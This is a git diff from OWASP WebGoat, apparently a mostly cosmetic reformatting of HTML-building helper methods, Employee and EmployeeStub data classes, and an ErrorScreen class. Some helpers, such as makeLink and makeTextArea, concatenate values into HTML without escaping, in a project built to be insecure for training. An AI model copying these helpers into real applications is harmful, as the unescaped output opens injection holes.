-    public static Select makePulldown(String name, Object[] list,
-	    String selected, int rowsShowing)
-    {
-
-	Select select = new Select(name);
-
-	for (int loop = 0; loop < list.length; loop++)
-	{
-
-	    String value = list[loop].toString();
-
-	    org.apache.ecs.html.Option o = new org.apache.ecs.html.Option(
-		    value, value, value);
-
-	    if (value.equals(selected))
-	    {
-
-		o.setSelected(true);
-
-	    }
-
-	    select.addElement(o);
-
-	}
-
-	select.setSize(rowsShowing);
-
-	return select;
-    }
-
-
-    /**
-     *  Default size of 1 for rows showing in select box.
-     *
-     * @param  diffNames  Description of the Parameter
-     * @param  select     Description of the Parameter
-     * @param  name       Description of the Parameter
-     * @param  options    Description of the Parameter
-     * @param  list       Description of the Parameter
-     * @param  selected   Description of the Parameter
-     * @return            Description of the Return Value
-     */
-
-    public static Element makeSelect(boolean diffNames, Select select,
-	    String name, Vector<Option> options, String[] list, String selected)
-    {
-
-	return makeSelect(diffNames, select, name, options, list, selected, 1);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  diffNames    Description of the Parameter
-     * @param  select       Description of the Parameter
-     * @param  name         Description of the Parameter
-     * @param  options      Description of the Parameter
-     * @param  list         Description of the Parameter
-     * @param  selected     Description of the Parameter
-     * @param  rowsShowing  Description of the Parameter
-     * @return              Description of the Return Value
-     */
-
-    public static Select makeSelect(boolean diffNames, Select select,
-	    String name, Vector<Option> options, String[] list, String selected,
-	    int rowsShowing)
-    {
-
-	if (select == null)
-	{
-
-	    select = new Select(name);
-
-	    if (diffNames)
-	    {
-
-		for (int loop = 0; loop < list.length; loop += 2)
+		if (name.equals(PASSWORD))
 		{
 
-		    String value = list[loop];
-
-		    String label = list[loop + 1];
-
-		    Option o = new Option(value);
-
-		    if (loop == 0)
-		    {
-
-			o.setSelected(true);
-
-		    }
-
-		    options.addElement(o);// add to Vector containing all options
-
-		    select.addElement(o);
-
-		    select.addElement(label);
+			field.setType(Input.PASSWORD);
 
 		}
 
-	    }
+		return (makeField(labeltext, value, field));
+	}
 
-	    else
-	    {
+	/**
+	 * Description of the Method
+	 * 
+	 * @param label
+	 *            Description of the Parameter
+	 * @param type
+	 *            Description of the Parameter
+	 * @param name
+	 *            Description of the Parameter
+	 * @param value
+	 *            Description of the Parameter
+	 * @param alignment
+	 *            Description of the Parameter
+	 * @param selected
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	public static Element makeInput(String label, String type, String name, boolean value, boolean selected,
+			String alignment)
+	{
+
+		return makeInput(label, type, name, new Boolean(value).toString(), selected, alignment);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param label
+	 *            Description of the Parameter
+	 * @param type
+	 *            Description of the Parameter
+	 * @param name
+	 *            Description of the Parameter
+	 * @param value
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	public static Element makeInput(String label, String type, String name, String value)
+	{
+
+		return makeInput(label, type, name, value, new Boolean(value).booleanValue(), "RIGHT");
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param label
+	 *            Description of the Parameter
+	 * @param type
+	 *            Description of the Parameter
+	 * @param name
+	 *            Description of the Parameter
+	 * @param value
+	 *            Description of the Parameter
+	 * @param alignment
+	 *            Description of the Parameter
+	 * @param selected
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	public static Element makeInput(String label, String type, String name, String value, boolean selected,
+			String alignment)
+	{
+
+		ElementContainer ec = new ElementContainer();
+
+		if (!alignment.equalsIgnoreCase("LEFT"))
+		{
+
+			ec.addElement(new StringElement(label));
+
+		}
+
+		Input input = new Input(type, name, value);
+
+		ec.addElement(input);
+
+		if (alignment.equalsIgnoreCase("LEFT"))
+		{
+
+			ec.addElement(new StringElement(label));
+
+		}
+
+		if (type.equalsIgnoreCase("CHECKBOX"))
+		{
+
+			input.setChecked(selected);
+
+		}
+
+		return (ec);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param text
+	 *            Description of the Parameter
+	 * @param name
+	 *            Description of the Parameter
+	 * @param value
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	public static A makeLink(String text, String name, String value)
+	{
+
+		String href = "attack?" + name;
+
+		if (value.length() > 0)
+		{
+
+			href = href + "=" + value;
+
+		}
+
+		A a = new A(href);
+
+		a.addElement(new U().addElement(text));
+
+		a.addAttribute("style", "cursor:hand");
+
+		return (a);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param text
+	 *            Description of the Parameter
+	 * @param name
+	 *            Description of the Parameter
+	 * @param value
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	public static A makeLink(String text, String name, int value)
+	{
+
+		return (makeLink(text, name, Integer.toString(value)));
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param text
+	 *            Description of the Parameter
+	 * @param name
+	 *            Description of the Parameter
+	 * @param value
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	public static A makeLink(String text, String name, boolean value)
+	{
+
+		return (makeLink(text, name, new Boolean(value).toString()));
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param text
+	 *            Description of the Parameter
+	 * @param clickAction
+	 *            Description of the Parameter
+	 * @param type
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	public static Input makeOnClickInput(String text, String clickAction, String type)
+	{
+
+		Input b = new Input();
+
+		b.setType(type);
+
+		b.setValue(text);
+
+		b.setOnClick(clickAction);
+
+		return (b);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param labeltext
+	 *            Description of the Parameter
+	 * @param value
+	 *            Description of the Parameter
+	 * @param e
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	public static TR makeOption(String labeltext, String value, Element e)
+	{
+
+		TD left = new TD().setAlign("left").setWidth("10%");
+
+		left.addElement(e);
+
+		TD right = new TD().setAlign("right");
+
+		Label label = new Label().addElement(labeltext);
+
+		right.addElement(label);
+
+		TR row = new TR();
+
+		row.addElement(right);
+
+		row.addElement(left);
+
+		return (row);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param label
+	 *            Description of the Parameter
+	 * @param value
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	public static Option makeOption(String label, boolean value)
+	{
+
+		Option option = new Option(label, new Boolean(value).toString());
+
+		option.setSelected(value);
+
+		return option;
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param line
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	private static org.apache.ecs.html.Option makeOption(String line)
+	{
+
+		StringTokenizer st = new StringTokenizer(line, "|");
+
+		org.apache.ecs.html.Option o = new org.apache.ecs.html.Option();
+
+		String token = "";
+
+		if (st.hasMoreTokens())
+		{
+
+			token = st.nextToken();
+
+		}
+
+		o.addElement(token);
+
+		return (o);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @param options
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	public static Element makePulldown(String name, List<String> options)
+	{
+
+		Select s = new Select(name);
+
+		s.addElement(options.toArray(new String[options.size()]));
+
+		return (s);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param results
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	public static Element makePulldown(String name, String results)
+	{
+
+		Select select = new Select(name);
+
+		StringTokenizer st = new StringTokenizer(results, "\n");
+
+		if (!st.hasMoreTokens()) {
+
+		return (new StringElement("")); }
+
+		while (st.hasMoreTokens())
+		{
+
+			String line = st.nextToken();
+
+			select.addElement(makeOption(line));
+
+		}
+
+		select.addElement("-------------------------");
+
+		return (select);
+	}
+
+	/**
+	 * Description of the Method
+	 * 
+	 * @param name
+	 *            Description of the Parameter
+	 * @param list
+	 *            Description of the Parameter
+	 * @param selected
+	 *            Description of the Parameter
+	 * @param rowsShowing
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+
+	public static Select makePulldown(String name, Object[] list, String selected, int rowsShowing)
+	{
+
+		Select select = new Select(name);
 
 		for (int loop = 0; loop < list.length; loop++)
 		{
 
-		    String value = list[loop];
+			String value = list[loop].toString();
 
-		    org.apache.ecs.html.Option o = new org.apache.ecs.html.Option(
-			    value);
+			org.apache.ecs.html.Option o = new org.apache.ecs.html.Option(value, value, value);
 
-		    if (loop == 0)
-		    {
+			if (value.equals(selected))
+			{
 
-			o.setSelected(true);
+				o.setSelected(true);
 
-		    }
+			}
 
-		    options.addElement(o);// add to Vector containing all options
-
-		    select.addElement(o);
-
-		    select.addElement(value);
+			select.addElement(o);
 
 		}
 
-	    }
+		select.setSize(rowsShowing);
 
+		return select;
 	}
 
-	// find selected option and set selected
+	/**
+	 * Default size of 1 for rows showing in select box.
+	 * 
+	 * @param diffNames
+	 *            Description of the Parameter
+	 * @param select
+	 *            Description of the Parameter
+	 * @param name
+	 *            Description of the Parameter
+	 * @param options
+	 *            Description of the Parameter
+	 * @param list
+	 *            Description of the Parameter
+	 * @param selected
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
 
-	Iterator i = options.iterator();
-
-	while (i.hasNext())
+	public static Element makeSelect(boolean diffNames, Select select, String name, Vector<Option> options,
+			String[] list, String selected)
 	{
 
-	    org.apache.ecs.html.Option o = (org.apache.ecs.html.Option) i
-		    .next();
-
-	    if (selected.equalsIgnoreCase(o.getAttribute("value")))
-	    {
-
-		o.setSelected(true);
-
-	    }
-
+		return makeSelect(diffNames, select, name, options, list, selected, 1);
 	}
 
-	select.setSize(rowsShowing);
+	/**
+	 * Description of the Method
+	 * 
+	 * @param diffNames
+	 *            Description of the Parameter
+	 * @param select
+	 *            Description of the Parameter
+	 * @param name
+	 *            Description of the Parameter
+	 * @param options
+	 *            Description of the Parameter
+	 * @param list
+	 *            Description of the Parameter
+	 * @param selected
+	 *            Description of the Parameter
+	 * @param rowsShowing
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
 
-	return (select);
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  title  Description of the Parameter
-     * @return        Description of the Return Value
-     */
-    public static Element makeTallHeader(String title)
-    {
-	StringBuffer buff = new StringBuffer();
-	for (int i = 0; i < title.length(); i++)
+	public static Select makeSelect(boolean diffNames, Select select, String name, Vector<Option> options,
+			String[] list, String selected, int rowsShowing)
 	{
-	    buff.append(title.charAt(i));
-	    buff.append("<BR>");
+
+		if (select == null)
+		{
+
+			select = new Select(name);
+
+			if (diffNames)
+			{
+
+				for (int loop = 0; loop < list.length; loop += 2)
+				{
+
+					String value = list[loop];
+
+					String label = list[loop + 1];
+
+					Option o = new Option(value);
+
+					if (loop == 0)
+					{
+
+						o.setSelected(true);
+
+					}
+
+					options.addElement(o);// add to Vector containing all options
+
+					select.addElement(o);
+
+					select.addElement(label);
+
+				}
+
+			}
+
+			else
+			{
+
+				for (int loop = 0; loop < list.length; loop++)
+				{
+
+					String value = list[loop];
+
+					org.apache.ecs.html.Option o = new org.apache.ecs.html.Option(value);
+
+					if (loop == 0)
+					{
+
+						o.setSelected(true);
+
+					}
+
+					options.addElement(o);// add to Vector containing all options
+
+					select.addElement(o);
+
+					select.addElement(value);
+
+				}
+
+			}
+
+		}
+
+		// find selected option and set selected
+
+		Iterator i = options.iterator();
+
+		while (i.hasNext())
+		{
+
+			org.apache.ecs.html.Option o = (org.apache.ecs.html.Option) i.next();
+
+			if (selected.equalsIgnoreCase(o.getAttribute("value")))
+			{
+
+				o.setSelected(true);
+
+			}
+
+		}
+
+		select.setSize(rowsShowing);
+
+		return (select);
 	}
-	return new TH(buff.toString());
-    }
 
+	/**
+	 * Description of the Method
+	 * 
+	 * @param title
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
+	public static Element makeTallHeader(String title)
+	{
+		StringBuffer buff = new StringBuffer();
+		for (int i = 0; i < title.length(); i++)
+		{
+			buff.append(title.charAt(i));
+			buff.append("<BR>");
+		}
+		return new TH(buff.toString());
+	}
 
-    /**
-     *  Description of the Method
-     *
-     * @param  title  Description of the Parameter
-     * @param  text   Description of the Parameter
-     * @return        Description of the Return Value
-     */
+	/**
+	 * Description of the Method
+	 * 
+	 * @param title
+	 *            Description of the Parameter
+	 * @param text
+	 *            Description of the Parameter
+	 * @return Description of the Return Value
+	 */
 
-    public static Element makeTextArea(String title, String text)
-    {
+	public static Element makeTextArea(String title, String text)
+	{
 
-	ElementContainer ec = new ElementContainer();
+		ElementContainer ec = new ElementContainer();
 
-	ec.addElement(new BR());
+		ec.addElement(new BR());
 
-	ec.addElement(new H3().addElement(title));
+		ec.addElement(new H3().addElement(title));
 
-	ec.addElement(new P());
+		ec.addElement(new P());
 
-	ec.addElement("<CENTER><TEXTAREA ROWS=10 COLS=90 READONLY>" + text
-		+ "</TEXTAREA></CENTER>");
+		ec.addElement("<CENTER><TEXTAREA ROWS=10 COLS=90 READONLY>" + text + "</TEXTAREA></CENTER>");
 
-	ec.addElement(new BR());
+		ec.addElement(new BR());
 
-	ec.addElement(new BR());
+		ec.addElement(new BR());
 
-	return (ec);
-    }
+		return (ec);
+	}
 
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/Employee.java b/main/project/JavaSource/org/owasp/webgoat/session/Employee.java
index fd297cfb1..f28e82541 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/Employee.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/Employee.java
@@ -1,271 +1,241 @@
+
 package org.owasp.webgoat.session;
 
 import java.io.Serializable;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class Employee implements Serializable
 {
 
-    /**
+	/**
 	 * 
 	 */
 	private static final long serialVersionUID = -1901957360367218399L;
 
 	public final static String EMPLOYEE_ROLE = "employee";
 
-    public final static String MANAGER_ROLE = "manager";
+	public final static String MANAGER_ROLE = "manager";
 
-    public final static String HR_ROLE = "hr";
+	public final static String HR_ROLE = "hr";
 
-    private int id;
+	private int id;
 
-    private String firstName;
+	private String firstName;
 
-    private String lastName;
+	private String lastName;
 
-    private String title;
+	private String title;
 
-    private String ssn;
+	private String ssn;
 
-    private String phone;
+	private String phone;
 
-    private String address1;
+	private String address1;
 
-    private String address2;
+	private String address2;
 
-    private int manager;
+	private int manager;
 
-    private String startDate;
+	private String startDate;
 
-    private int salary;
+	private int salary;
 
-    private String ccn;
+	private String ccn;
 
-    private int ccnLimit;
+	private int ccnLimit;
 
-    private String disciplinaryActionDate;
+	private String disciplinaryActionDate;
 
-    private String disciplinaryActionNotes;
+	private String disciplinaryActionNotes;
 
-    private String personalDescription;
+	private String personalDescription;
 
+	// FIXME: To be deleted
+	public Employee()
+	{
+	}
 
-    // FIXME: To be deleted
-    public Employee()
-    {}
+	public Employee(int id, String firstName, String lastName, String ssn, String title, String phone, String address1,
+			String address2, int manager, String startDate, int salary, String ccn, int ccnLimit,
+			String disciplinaryActionDate, String disciplinaryActionNotes, String personalDescription)
+	{
+		this.id = id;
+		this.firstName = firstName;
+		this.lastName = lastName;
+		this.ssn = ssn;
+		this.title = title;
+		this.phone = phone;
+		this.address1 = address1;
+		this.address2 = address2;
+		this.manager = manager;
+		this.startDate = startDate;
+		this.salary = salary;
+		this.ccn = ccn;
+		this.ccnLimit = ccnLimit;
+		this.disciplinaryActionDate = disciplinaryActionDate;
+		this.disciplinaryActionNotes = disciplinaryActionNotes;
+		this.personalDescription = personalDescription;
+	}
 
-
-    public Employee(int id, String firstName, String lastName, String ssn,
-	    String title, String phone, String address1, String address2,
-	    int manager, String startDate, int salary, String ccn,
-	    int ccnLimit, String disciplinaryActionDate,
-	    String disciplinaryActionNotes, String personalDescription)
-    {
-	this.id = id;
-	this.firstName = firstName;
-	this.lastName = lastName;
-	this.ssn = ssn;
-	this.title = title;
-	this.phone = phone;
-	this.address1 = address1;
-	this.address2 = address2;
-	this.manager = manager;
-	this.startDate = startDate;
-	this.salary = salary;
-	this.ccn = ccn;
-	this.ccnLimit = ccnLimit;
-	this.disciplinaryActionDate = disciplinaryActionDate;
-	this.disciplinaryActionNotes = disciplinaryActionNotes;
-	this.personalDescription = personalDescription;
-    }
-
-
-    public String getAddress1()
-    {
-	return address1;
-    }
-
-
-    public void setAddress1(String address1)
-    {
-	this.address1 = address1;
-    }
-
-
-    public String getAddress2()
-    {
-	return address2;
-    }
-
-
-    public void setAddress2(String address2)
-    {
-	this.address2 = address2;
-    }
-
-
-    public String getCcn()
-    {
-	return ccn;
-    }
-
-
-    public void setCcn(String ccn)
-    {
-	this.ccn = ccn;
-    }
-
-
-    public int getCcnLimit()
-    {
-	return ccnLimit;
-    }
-
-
-    public void setCcnLimit(int ccnLimit)
-    {
-	this.ccnLimit = ccnLimit;
-    }
-
-
-    public String getFirstName()
-    {
-	return firstName;
-    }
-
-
-    public void setFirstName(String firstName)
-    {
-	this.firstName = firstName;
-    }
-
-
-    public String getLastName()
-    {
-	return lastName;
-    }
-
-
-    public void setLastName(String lastName)
-    {
-	this.lastName = lastName;
-    }
-
-
-    public String getPhoneNumber()
-    {
-	return phone;
-    }
-
-
-    public void setPhoneNumber(String phone)
-    {
-	this.phone = phone;
-    }
-
-
-    public int getSalary()
-    {
-	return salary;
-    }
-
-
-    public void setSalary(int salary)
-    {
-	this.salary = salary;
-    }
-
-
-    public String getSsn()
-    {
-	return ssn;
-    }
-
-
-    public void setSsn(String ssn)
-    {
-	this.ssn = ssn;
-    }
-
-
-    public String getStartDate()
-    {
-	return startDate;
-    }
-
-
-    public void setStartDate(String startDate)
-    {
-	this.startDate = startDate;
-    }
-
-
-    public int getId()
-    {
-	return id;
-    }
-
-
-    public void setId(int id)
-    {
-	this.id = id;
-    }
-
-
-    public String getTitle()
-    {
-	return this.title;
-    }
-
-
-    public int getManager()
-    {
-	return this.manager;
-    }
-
-
-    public String getDisciplinaryActionDate()
-    {
-	return this.disciplinaryActionDate;
-    }
-
-
-    public String getDisciplinaryActionNotes()
-    {
-	return this.disciplinaryActionNotes;
-    }
-
-
-    public String getPersonalDescription()
-    {
-	return this.personalDescription;
-    }
+	public String getAddress1()
+	{
+		return address1;
+	}
+
+	public void setAddress1(String address1)
+	{
+		this.address1 = address1;
+	}
+
+	public String getAddress2()
+	{
+		return address2;
+	}
+
+	public void setAddress2(String address2)
+	{
+		this.address2 = address2;
+	}
+
+	public String getCcn()
+	{
+		return ccn;
+	}
+
+	public void setCcn(String ccn)
+	{
+		this.ccn = ccn;
+	}
+
+	public int getCcnLimit()
+	{
+		return ccnLimit;
+	}
+
+	public void setCcnLimit(int ccnLimit)
+	{
+		this.ccnLimit = ccnLimit;
+	}
+
+	public String getFirstName()
+	{
+		return firstName;
+	}
+
+	public void setFirstName(String firstName)
+	{
+		this.firstName = firstName;
+	}
+
+	public String getLastName()
+	{
+		return lastName;
+	}
+
+	public void setLastName(String lastName)
+	{
+		this.lastName = lastName;
+	}
+
+	public String getPhoneNumber()
+	{
+		return phone;
+	}
+
+	public void setPhoneNumber(String phone)
+	{
+		this.phone = phone;
+	}
+
+	public int getSalary()
+	{
+		return salary;
+	}
+
+	public void setSalary(int salary)
+	{
+		this.salary = salary;
+	}
+
+	public String getSsn()
+	{
+		return ssn;
+	}
+
+	public void setSsn(String ssn)
+	{
+		this.ssn = ssn;
+	}
+
+	public String getStartDate()
+	{
+		return startDate;
+	}
+
+	public void setStartDate(String startDate)
+	{
+		this.startDate = startDate;
+	}
+
+	public int getId()
+	{
+		return id;
+	}
+
+	public void setId(int id)
+	{
+		this.id = id;
+	}
+
+	public String getTitle()
+	{
+		return this.title;
+	}
+
+	public int getManager()
+	{
+		return this.manager;
+	}
+
+	public String getDisciplinaryActionDate()
+	{
+		return this.disciplinaryActionDate;
+	}
+
+	public String getDisciplinaryActionNotes()
+	{
+		return this.disciplinaryActionNotes;
+	}
+
+	public String getPersonalDescription()
+	{
+		return this.personalDescription;
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/EmployeeStub.java b/main/project/JavaSource/org/owasp/webgoat/session/EmployeeStub.java
index 459f109b6..d74c994f5 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/EmployeeStub.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/EmployeeStub.java
@@ -1,88 +1,82 @@
+
 package org.owasp.webgoat.session;
 
 import java.io.Serializable;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  */
 public class EmployeeStub implements Serializable
 {
 
-    /**
+	/**
 	 * 
 	 */
 	private static final long serialVersionUID = -7109162877797765632L;
 
 	private int id;
 
-    private String firstName;
+	private String firstName;
 
-    private String lastName;
+	private String lastName;
 
-    private String role;
+	private String role;
 
+	public EmployeeStub(int id, String firstName, String lastName)
+	{
+		this(id, firstName, lastName, Employee.EMPLOYEE_ROLE);
+	}
 
-    public EmployeeStub(int id, String firstName, String lastName)
-    {
-	this(id, firstName, lastName, Employee.EMPLOYEE_ROLE);
-    }
+	public EmployeeStub(int id, String firstName, String lastName, String role)
+	{
+		this.id = id;
+		this.firstName = firstName;
+		this.lastName = lastName;
+		this.role = role;
+	}
 
+	public String getFirstName()
+	{
+		return firstName;
+	}
 
-    public EmployeeStub(int id, String firstName, String lastName, String role)
-    {
-	this.id = id;
-	this.firstName = firstName;
-	this.lastName = lastName;
-	this.role = role;
-    }
+	public int getId()
+	{
+		return id;
+	}
 
+	public String getLastName()
+	{
+		return lastName;
+	}
 
-    public String getFirstName()
-    {
-	return firstName;
-    }
-
-
-    public int getId()
-    {
-	return id;
-    }
-
-
-    public String getLastName()
-    {
-	return lastName;
-    }
-
-
-    public String getRole()
-    {
-	return role;
-    }
+	public String getRole()
+	{
+		return role;
+	}
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/session/ErrorScreen.java b/main/project/JavaSource/org/owasp/webgoat/session/ErrorScreen.java
index 5aa734794..4691d286d 100644
--- a/main/project/JavaSource/org/owasp/webgoat/session/ErrorScreen.java
+++ b/main/project/JavaSource/org/owasp/webgoat/session/ErrorScreen.java
@@ -1,12 +1,11 @@
+
 package org.owasp.webgoat.session;
 
 import java.io.ByteArrayOutputStream;
 import java.io.PrintWriter;
 import java.util.StringTokenizer;
 import javax.servlet.ServletException;
-
 import org.owasp.webgoat.lessons.AbstractLesson;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.HtmlColor;
@@ -20,201 +19,194 @@ import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
 
 
-/*******************************************************************************
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
- * @created    November 4, 2003
+ * 
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ * @created November 4, 2003
  */
 public class ErrorScreen extends Screen
 {
 	/**
-	 *  Description of the Field
+	 * Description of the Field
 	 */
 	protected Throwable error;
 
 	/**
-	 *  Description of the Field
+	 * Description of the Field
 	 */
 	protected String message;
 
-
-
 	/**
-	 *  Constructor for the ErrorScreen object
-	 *
-	 * @param  s  Description of the Parameter
-	 * @param  t  Description of the Parameter
+	 * Constructor for the ErrorScreen object
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @param t
+	 *            Description of the Parameter
 	 */
-	public ErrorScreen( WebSession s, Throwable t )
+	public ErrorScreen(WebSession s, Throwable t)
 	{
 		this.error = t;
-		fixCurrentScreen( s );
-		setup( s );
+		fixCurrentScreen(s);
+		setup(s);
 	}
 
-
 	/**
-	 *  Constructor for the ErrorScreen object
-	 *
-	 * @param  s    Description of the Parameter
-	 * @param  msg  Description of the Parameter
+	 * Constructor for the ErrorScreen object
+	 * 
+	 * @param s
+	 *            Description of the Parameter
+	 * @param msg
+	 *            Description of the Parameter
 	 */
-	public ErrorScreen( WebSession s, String msg )
+	public ErrorScreen(WebSession s, String msg)
 	{
 		this.message = msg;
-		fixCurrentScreen( s );
-		setup( s );
+		fixCurrentScreen(s);
+		setup(s);
 	}
 
-
-	public void fixCurrentScreen( WebSession s )
+	public void fixCurrentScreen(WebSession s)
 	{
 		// So the user can't get stuck on the error screen, reset the
 		// current screen to something known
-		if ( s!= null )
-		{ 
-			try 
+		if (s != null)
+		{
+			try
 			{
-				s.setCurrentScreen( s.getCourse().getFirstLesson().getScreenId() );
-			}
-			catch ( Throwable t )
+				s.setCurrentScreen(s.getCourse().getFirstLesson().getScreenId());
+			} catch (Throwable t)
 			{
-				s.setCurrentScreen( WebSession.WELCOME );
+				s.setCurrentScreen(WebSession.WELCOME);
 			}
 		}
 	}
 
-	
-	public void setup( WebSession s )
+	public void setup(WebSession s)
 	{
 		// call createContent first so messages will go somewhere
 
-		Form form = new Form( "attack", Form.POST ).setName( "form" ).setEncType( "" );
+		Form form = new Form("attack", Form.POST).setName("form").setEncType("");
 
-		form.addElement( wrapForm( s ) );
+		form.addElement(wrapForm(s));
 
-		TD lowerright = new TD().setHeight( "100%" ).setVAlign( "top" ).setAlign( "left" ).addElement( form );
-		TR row = new TR().addElement( lowerright );
